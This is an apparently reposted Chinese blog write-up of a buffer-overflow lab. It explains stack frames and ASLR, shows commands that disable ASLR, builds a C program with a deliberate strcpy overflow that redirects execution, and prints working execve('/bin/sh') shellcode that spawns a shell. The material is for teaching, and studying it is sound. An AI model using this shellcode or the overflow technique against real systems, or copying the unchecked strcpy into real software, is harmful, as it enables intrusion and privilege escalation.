[操作系统安全]缓冲区溢出

这篇具有很好参考价值的文章主要介绍了[操作系统安全]缓冲区溢出。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、C栈帧结构

  1. 函数调用内存中的三个区域,代码区、静态数据区、动态数据区(压栈和清栈就是在这个区域完成的)。
  2. CPU中有三个寄存器,分别是eip、ebp和esp。eip永远指向代码区中将要执行的下一条指令,执行方式包括顺序执行和跳转;ebp和esp用于管理栈空间,ebp指向栈底,esp指向栈顶,代码区中的函数调用、返回和执行都伴随着不断的压栈和清栈,在调用函数时,ebp会指向Previous Frame Pointer以在执行函数之后返回到原来的地址。栈中数据存储和释放的原则:后进先出。

二、实验原理

  1. 1、缓冲区溢出是因为在程序执行时数据的长度超出了预先分配的空间大小,导致覆盖了其他数据的分配区域,从而执行非授权指令,获取信息,取得系统特权进而进行各种非法操作导致程序运行失败、系统宕机、重新启动等后果。普通的程序员由于失误导致的缓冲区溢出可能只会导致程序无法运行而不会影响系统,但是如果黑客使用构造好的数据来进行缓冲区溢出攻击则可能获得超级管理员权限,非常危险。
  2. 2、数据执行保护机制的开启与关闭
  3. ASLR 技术是一种针对缓冲区溢出的安全保护技术。
  4. ASLR功能等级:Linux系统中ASLR 技术分三个等级。如下:
  • 0:没有随机化。即关闭 ASLR。
  • 1:保留的随机化。共享库、栈、mmap() 以及 VDSO 将被随机化。
  • 2:完全的随机化。在 1 的基础上,通过 brk() 分配的内存空间也将被随机化。
  1. ASLR 功能关闭
  2. ASLR 的等级可以通过一个内核参数  randomize_va_space  来进行控制。
  3. 系统默认这个功能是开启的。有时候调试代码时,需要更改 ASLR 功能,可通过命令设置。
  4. 如果想关闭该功能,则可以输入如下命令即可关闭,注意需要 root 权限,命令如下:
echo 0 > /proc/sys/kernel/randomize_va_space

ASLR功能开启

echo 1 > /proc/sys/kernel/randomize_va_space

可通过命令查看当前系统的 ASLR 等级,操作如下:

cat /proc/sys/kernel/randomize_va_space

三、实验过程

1、首先我们要构造一个拥有缓冲区溢出漏洞的程序,代码如下:

#include <stdio.h>

#include <string.h>

char buffer[] = "01234567890123456789========ABCD";

void foo1(){

    printf("Run foo1() ,you are attacked !\n");

}

void foo()

{

       char buff[16];

   strcpy (buff, buffer);

   printf("Run foo() ....\n");

}

int main(int argc, char * argv[])

{

       foo();

   return 0;

}

找到foo1()函数的入口地址,并将该地址以存放在字符串存入缓存时溢出部位:ABCD,来引导该函数运行。

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

首先在打开数据执行保护的状态下,对其进行重新编译,并进行调试

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

可以看到由于打开数据执行保护,缓存溢出后会被检测到,并强制停止。

2、之后我们在关闭数据执行保护的状态下,对其进行编译,并进行调试

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

 

可以看到,虽然foo1()函数并没有被调用,但其仍然被执行了。

3、完成上面部分后,我们对foo1()函数进行设计,即设计shellcode部分。

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制之机器码,以其经常让攻击者获得shell而得名。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机械码,让电脑可以执行攻击者的任意指令。

下面这段代码是通过C语言启动sh命令的程序,由于shellcode经常用机器编码编写,因此我们需要对其进行反编译得到机器码。

#include <stdio.h>

 

 int main()

 {

 char *name[2];

 name[0] = "/bin/sh";

 name[1] = NULL;

 execve(name[0], name, NULL);

 return 0;

 }

反编译后得到以下机器码:

        "\x31\xc0"              /* xor   %eax,%eax */

        "\x50"                  /* push   %eax */

        "\x68""//sh"                /* push   $0x68732f2f */

        "\x68""/bin"                /* push   $0x6e69622f */

        "\x89\xe3"              /* mov    %esp,%ebx */

        "\x50"                  /* push   %eax */

        "\x53"                  /* push   %ebx */

        "\x89\xe1"              /* mov    %esp,%ecx */

        "\x31\xd2"              /* xor    %edx, %edx */

        "\xb0\x0b"              /* movb    $0xb,%al */

        "\xcd\x80";             /* int     $0x80 */

将得到的机器码添加到foo1()函数中,并执行,即可将攻击代码注入。

#include <stdio.h>

#include <string.h>

char buffer[] = "01234567890123456789========\x00\x00\x11\xed";

void foo1(){

    printf("Run foo1() ,you are attacked !\n");

char shellcode[]=

        "\x31\xc0"              /* xor   %eax,%eax */

        "\x50"                  /* push   %eax */

        "\x68""//sh"                /* push   $0x68732f2f */

        "\x68""/bin"                /* push   $0x6e69622f */

        "\x89\xe3"              /* mov    %esp,%ebx */

        "\x50"                  /* push   %eax */

        "\x53"                  /* push   %ebx */

        "\x89\xe1"              /* mov    %esp,%ecx */

        "\x31\xd2"              /* xor    %edx, %edx */

        "\xb0\x0b"              /* movb    $0xb,%al */

        "\xcd\x80";             /* int     $0x80 */

    void (*fp)(void);

    fp = (void*)shellcode;

    fp();

    printf("Run foo1() ,you are attacked222 !\n");

}

void foo()

{

       char buff[16];

   strcpy (buff, buffer);

   printf("Run foo() ....\n");

}

int main(int argc, char * argv[])

{

       foo();

   return 0;

}

此时重新编译运行可以看到被攻击后进入shell命令行,攻击成功。

系统在此应用中检测到缓冲区溢出,linux,运维,服务器

 

参考:

缓冲区溢出与数据执行保护DEP - kkqq的文章 - 知乎 https://zhuanlan.zhihu.com/p/500221354

Linux下 ASLR功能与 -no-pie 选项说明_no pie_凌雪舞的博客-CSDN博客

缓冲区溢出实验 - 小黑豆的文章 - 知乎 https://zhuanlan.zhihu.com/p/138620118

缓冲区溢出实验 - 在路上的文章 - 知乎 https://zhuanlan.zhihu.com/p/151814689文章来源地址https://www.toymoban.com/news/detail-780476.html

到了这里,关于[操作系统安全]缓冲区溢出的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全缓冲区溢出与僵尸网络答题分析

    一、缓冲区溢出攻击 缓冲区溢出是指当计算机向缓冲区内填充数据位数时超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上。理想的情况是:程序会检查数据长度,而且并不允许输入超过缓冲区长度的字符。但是绝大多数程序都会假设数据长度总是与所分配的储存空间

    2023年04月21日
    浏览(28)
  • 【HUST】网络攻防实践|6_物联网设备固件安全实验|实验一 裸机缓冲区溢出漏洞利用

    写在最前: 大家分析的时候看一下自己学号是多少,然后分析对应的文件哈,我想都没想就打开01分析了,全部都做完了发现我不是这个文件,当事人现在就是很后悔,非常后悔呜呜呜呜呜。 打开 IDA Pro 7.6 ,打开 task1_0x.elf 文件, 选对应的选项。 然后点开 main 函数, f5 反汇

    2024年02月09日
    浏览(38)
  • SEED-缓冲区溢出攻击

    实验环境:SEED-Ubuntu20.04虚拟机 a) 缓冲区溢出原理 **缓冲区溢出攻击原理:**利用溢出的数据改变源程序的控制流,如覆盖返回地址 b) 分析生成badfile文件的exploit.py程序 Shellcode部分 字节数组末尾处填入shellcode c) 编译目标服务器上具有缓冲区溢出漏洞的stack.c程序,并将其缓冲

    2024年02月07日
    浏览(35)
  • 漏洞利用与缓冲区溢出攻击

    目录 简介: 1. 漏洞利用基础 2. 缓冲区溢出攻击 3. 缓解缓冲区溢出攻击 3.1 边界检查 3.2 使用安全函数 3.3 使用堆栈保护技术 总结: 简介: 漏洞利用是渗透测试中的重要部分,它允许攻击者通过利用软件或系统的漏洞来获取未经授权的访问权限。其中,缓冲区溢出攻击是最常

    2024年02月14日
    浏览(89)
  • 5.1 缓冲区溢出与攻防博弈

    在黑客安全圈子中,基于内存攻击技术的攻击手段在随着时代的变化而不断发展着,内存攻击是指通过利用软件的安全漏洞,构造恶意的输入,从而使正常程序造成拒绝服务或者是远程获得控制权,内存攻击技术中最先登上历史舞台的就是缓冲区溢出漏洞,时至今日能够被广

    2024年02月16日
    浏览(28)
  • Redis缓冲区溢出及解决方案

    缓冲区(buffer),是内存空间的一部分。也就是说,在内存空间中预留了一定的存储空间,这些存储空间用来缓冲输入或输出的数据,这部分预留的空间就叫做缓冲区。 在Redis中,主要有三个场景用到了缓冲区的概念。 在客户端和服务器端之间进行通信时,用来暂存客户端发送

    2023年04月12日
    浏览(30)
  • 网络攻防技术——缓冲区溢出攻击(基于服务器)

          缓冲区溢出 被定义为程序试图将数据写入缓冲区边界之外的情况。恶意用户可以利用此漏洞更改程序的流控制,从而导致恶意代码的执行。本实验的目的是让学生对这种类型的漏洞有实际的了解,并学习如何利用攻击中的漏洞。      在这个实验中,学生将得到四个不

    2024年02月02日
    浏览(50)
  • CVE-2023-5129 libwebp堆缓冲区溢出漏洞影响分析

    近日苹果、谷歌、Mozilla和微软等公司积极修复了libwebp组件中的缓冲区溢出漏洞,相关时间线如下: 9月7日,苹果发布紧急更新,修复了此前由多伦多大学公民实验室报告的iMessage 0-click 漏洞,漏洞被认为已经被NSO公司的Pegasus间谍软件所利用,漏洞编号CVE-2023-41064; 9月8日,

    2024年02月08日
    浏览(30)
  • sudo堆缓冲区溢出提权漏洞(CVE-2021-3156)

    这个漏洞被披露于2021年1月26日。漏洞的载体是我们常用的sudo命令。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或-i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。因此只要存在sudoers文件(通

    2024年02月13日
    浏览(34)
  • libcurl Socks5 堆缓冲区溢出漏洞(CVE-2023-38545)详细分析

    curl 是用于在各种网络协议之间传输数据的命令行工具,libcurl 用于提供处理网络通信和数据传输的 Api 接口。curl 默认下载缓冲区为 102400 字节,但如果设置低于每秒 102400 字节,缓冲区大小会自动设置为更小的值。libcurl 下载缓冲区默认为 16KB,应用程序可通过 CURLOPT_BUFFERSI

    2024年02月08日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包